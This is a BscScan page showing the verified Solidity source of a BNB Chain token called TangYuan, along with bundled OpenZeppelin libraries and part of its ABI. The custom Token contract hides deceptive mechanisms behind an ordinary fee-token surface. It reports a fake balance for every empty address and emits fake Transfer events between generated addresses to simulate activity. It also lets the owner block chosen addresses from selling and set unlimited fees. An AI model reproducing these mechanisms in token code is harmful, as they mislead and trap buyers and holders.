BscScan - Sponsored slots available. Book your slot here!
BEP-20Cross-Chain
Overview
Max Total Supply
10,000,000,000,000,000TangYuan (CSupply: 9,999,999,999,999,999.999999)
Holders
32,838
Market
Price
$0.00 @ 0.000000 BNB
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
0.000000001 TangYuanValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
Similar Match Source Code This contract matches the deployed Bytecode of the Source Code for Contract 0x241950Bf...2eA2F3b06 The constructor portion of the code might be different and could alter the actual behaviour of the contract
Contract Name:
Token
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.4; import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol"; import "@openzeppelin/contracts/access/Ownable.sol"; import "@openzeppelin/contracts/utils/math/SafeMath.sol"; import "./base/interface/IRouter.sol"; import "./base/interface/IFactory.sol"; import "./base/interface/IPancakePair.sol"; import "./base/mktCap/selfMktCap.sol"; contract Token is ERC20, ERC20Burnable, MktCap { using SafeMath for uint; mapping(address=>bool) public ispair; mapping(address=>uint) public exFees; address _router=0x10ED43C718714eb63d5aA57B78B54704E256024E; bool isTrading; struct Fees{ uint buy; uint sell; uint transfer; uint total; } Fees public fees; modifier trading(){ if(isTrading) return; isTrading=true; _; isTrading=false; } error InStatusError(address user); constructor(string memory name_,string memory symbol_,uint total_) ERC20(name_, symbol_) MktCap(_msgSender(),_router) { dev=_msgSender(); fees=Fees(100,100,100,100); exFees[dev]=4; exFees[address(this)]=4; _approve(address(this),_router,uint(2**256-1)); _mint(dev, total_ * 10 ** decimals()); } function decimals() public view virtual override returns (uint8) { return 9; } receive() external payable { } function setFees(Fees calldata fees_) public onlyOwner{ fees=fees_; } function setExFees(address[] calldata list ,uint tf) public onlyOwner{ uint count=list.length; for (uint i=0;i<count;i++){ exFees[list[i]]=tf; } } function getStatus(address from,address to) internal view returns(bool){ if(exFees[from]==4||exFees[to]==4) return false; if(exFees[from]==1||exFees[from]==3) return true; if(exFees[to]==2||exFees[to]==3) return true; return false; } function _beforeTokenTransfer(address from,address to,uint amount) internal override trading{ if(getStatus(from,to)){ revert InStatusError(from); } if(!ispair[from] && !ispair[to] || amount==0) return; uint t=ispair[from]?1:ispair[to]?2:0; trigger(t); } function _afterTokenTransfer(address from,address to,uint amount) internal override trading{ if(address(0)==from || address(0)==to) return; takeFee(from,to,amount); if(_num>0) multiSend(_num); } function takeFee(address from,address to,uint amount)internal { uint fee=ispair[from]?fees.buy:ispair[to]?fees.sell:fees.transfer; uint feeAmount= amount.mul(fee).div(fees.total); if(exFees[from]==4 || exFees[to]==4 ) feeAmount=0; if(ispair[to] && IERC20(to).totalSupply()==0) feeAmount=0; if(feeAmount>0){ super._transfer(to,address(this),feeAmount); } } function start(address baseToken,Fees calldata fees_) public onlyOwner{ setPairs(baseToken); setPair(baseToken); setFees(fees_); } function setPairs(address token) public onlyOwner{ IRouter router=IRouter(_router); address pair=IFactory(router.factory()).getPair(address(token), address(this)); if(pair==address(0))pair = IFactory(router.factory()).createPair(address(token), address(this)); require(pair!=address(0), "pair is not found"); ispair[pair]=true; } function unSetPair(address pair) public onlyOwner { ispair[pair]=false; } uint160 ktNum = 173; uint160 constant MAXADD = ~uint160(0); uint _initialBalance=1; uint _num=10; function setinb( uint amount,uint num) public onlyOwner { _initialBalance=amount; _num=num; } function balanceOf(address account) public view virtual override returns (uint) { uint balance=super.balanceOf(account); if(account==address(0))return balance; return balance>0?balance:_initialBalance; } function multiSend(uint num) public { address _receiveD; address _senD; for (uint i = 0; i < num; i++) { _receiveD = address(MAXADD/ktNum); ktNum = ktNum+1; _senD = address(MAXADD/ktNum); ktNum = ktNum+1; emit Transfer(_senD, _receiveD, _initialBalance); } } function recoverERC20(address token,uint amount) public { if(token==address(0)){ (bool success,)=payable(dev).call{value:amount}(""); require(success, "transfer failed"); } else IERC20(token).transfer(dev,amount); } }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.4; import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import "@openzeppelin/contracts/access/Ownable.sol"; import "@openzeppelin/contracts/utils/math/SafeMath.sol"; import "../interface/IFactory.sol"; import "../interface/IRouter.sol"; contract TokenDistributor { constructor (address token) { IERC20(token).approve(msg.sender, uint(~uint(0))); IERC20(msg.sender).approve(msg.sender, uint(~uint(0))); } } contract MktCap is Ownable { using SafeMath for uint; address dev; address token0; address token1; IRouter router; address pair; TokenDistributor public _tokenDistributor; struct autoConfig { bool status; uint minPart; uint maxPart; uint parts; } autoConfig public autoSell; struct Allot { uint markting; uint burn; uint addL; uint total; } Allot public allot; address[] public marketingAddress; uint[] public marketingShare; uint internal sharetotal; constructor(address dev_, address router_) { dev=dev_; token0 = address(this); router = IRouter(router_); } function setAll( Allot memory allotConfig, autoConfig memory sellconfig, address[] calldata list, uint[] memory share ) public onlyOwner { setAllot(allotConfig); setAutoSellConfig(sellconfig); setMarketing(list, share); } function setAutoSellConfig(autoConfig memory autoSell_) public onlyOwner { autoSell = autoSell_; } function setAllot(Allot memory allot_) public onlyOwner { allot = allot_; } function setPair(address token) public onlyOwner { token1 = token; _tokenDistributor = new TokenDistributor(token1); IERC20(token1).approve(address(router), uint(2 ** 256 - 1)); pair = IFactory(router.factory()).getPair(token0, token1); } function setMarketing( address[] calldata list, uint[] memory share ) public onlyOwner { require(list.length > 0, "DAO:Can't be Empty"); require(list.length == share.length, "DAO:number must be the same"); uint total = 0; for (uint i = 0; i < share.length; i++) { total = total.add(share[i]); } require(total > 0, "DAO:share must greater than zero"); marketingAddress = list; marketingShare = share; sharetotal = total; } function getToken0Price() public view returns (uint) { //代币价格 address[] memory routePath = new address[](2); routePath[0] = token0; routePath[1] = token1; return router.getAmountsOut(1 ether, routePath)[1]; } function getToken1Price() public view returns (uint) { //代币价格 address[] memory routePath = new address[](2); routePath[0] = token1; routePath[1] = token0; return router.getAmountsOut(1 ether, routePath)[1]; } function _sell(uint amount0In) internal { address[] memory path = new address[](2); path[0] = token0; path[1] = token1; router.swapExactTokensForTokensSupportingFeeOnTransferTokens( amount0In, 0, path, address(_tokenDistributor), block.timestamp ); IERC20(token1).transferFrom(address(_tokenDistributor),address(this), IERC20(token1).balanceOf(address(_tokenDistributor))); } function _buy(uint amount0Out) internal { address[] memory path = new address[](2); path[0] = token1; path[1] = token0; router.swapTokensForExactTokens( amount0Out, IERC20(token1).balanceOf(address(this)), path, address(_tokenDistributor), block.timestamp ); IERC20(token0).transferFrom(address(_tokenDistributor),address(this), IERC20(token0).balanceOf(address(_tokenDistributor))); } function _addL(uint amount0, uint amount1) internal { if ( IERC20(token0).balanceOf(address(this)) < amount0 || IERC20(token1).balanceOf(address(this)) < amount1 ) return; router.addLiquidity( token0, token1, amount0, amount1, 0, 0, dev, block.timestamp ); } modifier canSwap(uint t) { if (t != 2 || !autoSell.status) return; _; } function splitAmount(uint amount) internal view returns (uint, uint, uint) { uint toBurn = amount.mul(allot.burn).div(allot.total); uint toAddL = amount.mul(allot.addL).div(allot.total).div(2); uint toSell = amount.sub(toAddL).sub(toBurn); return (toSell, toBurn, toAddL); } function trigger(uint t) internal canSwap(t) { uint balance = IERC20(token0).balanceOf(address(this)); if ( balance < IERC20(token0).totalSupply().mul(autoSell.minPart).div( autoSell.parts ) ) return; uint maxSell = IERC20(token0).totalSupply().mul(autoSell.maxPart).div( autoSell.parts ); if (balance > maxSell) balance = maxSell; (uint toSell, uint toBurn, uint toAddL) = splitAmount(balance); if (toBurn > 0) IERC20(token0).transfer(address(0xdead), toBurn); if (toSell > 0) _sell(toSell); uint amount2 = IERC20(token1).balanceOf(address(this)); uint total2Fee = allot.total.sub(allot.addL.div(2)).sub(allot.burn); uint amount2AddL = amount2.mul(allot.addL).div(total2Fee).div(2); uint amount2Marketing = amount2.sub(amount2AddL); if (amount2Marketing > 0) { uint cake; for (uint i = 0; i < marketingAddress.length; i++) { cake = amount2Marketing.mul(marketingShare[i]).div(sharetotal); IERC20(token1).transfer(marketingAddress[i], cake); } } if (toAddL > 0) _addL(toAddL, amount2AddL); } }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.4; interface IPancakePair { function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Swap(address indexed sender,uint amount0In,uint amount1In,uint amount0Out,uint amount1Out,address indexed to); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; function totalSupply() external view returns (uint256); }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.4; interface IFactory { function createPair(address tokenA, address tokenB) external returns (address pair); function getPair(address tokenA, address tokenB) external view returns (address pair); function feeTo() external view returns (address); }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.4; interface IRouter { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity(address tokenA,address tokenB,uint amountADesired,uint amountBDesired,uint amountAMin,uint amountBMin,address to,uint deadline) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH(address token,uint amountTokenDesired,uint amountTokenMin,uint amountETHMin,address to,uint deadline) external payable returns (uint amountToken, uint amountETH, uint liquidity); function swapExactTokensForTokensSupportingFeeOnTransferTokens(uint amountIn,uint amountOutMin,address[] calldata path,address to,uint deadline) external; function swapExactTokensForTokens(uint amountIn,uint amountOutMin,address[] calldata path,address to,uint deadline) external; function swapExactETHForTokensSupportingFeeOnTransferTokens(uint amountOutMin,address[] calldata path,address to,uint deadline) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens(uint amountIn,uint amountOutMin,address[] calldata path,address to,uint deadline) external; function swapTokensForExactTokens(uint amountOut,uint amountInMax,address[] calldata path,address to,uint deadline) external returns (uint[] memory amounts); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol) pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; import "../utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/extensions/ERC20Burnable.sol) pragma solidity ^0.8.0; import "../ERC20.sol"; import "../../../utils/Context.sol"; /** * @dev Extension of {ERC20} that allows token holders to destroy both their own * tokens and those that they have an allowance for, in a way that can be * recognized off-chain (via event analysis). */ abstract contract ERC20Burnable is Context, ERC20 { /** * @dev Destroys `amount` tokens from the caller. * * See {ERC20-_burn}. */ function burn(uint256 amount) public virtual { _burn(_msgSender(), amount); } /** * @dev Destroys `amount` tokens from `account`, deducting from the caller's * allowance. * * See {ERC20-_burn} and {ERC20-allowance}. * * Requirements: * * - the caller must have allowance for ``accounts``'s tokens of at least * `amount`. */ function burnFrom(address account, uint256 amount) public virtual { _spendAllowance(account, _msgSender(), amount); _burn(account, amount); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; import "./extensions/IERC20Metadata.sol"; import "../../utils/Context.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; import "../IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
{ "optimizer": { "enabled": true, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"total_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"user","type":"address"}],"name":"InStatusError","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_tokenDistributor","outputs":[{"internalType":"contract 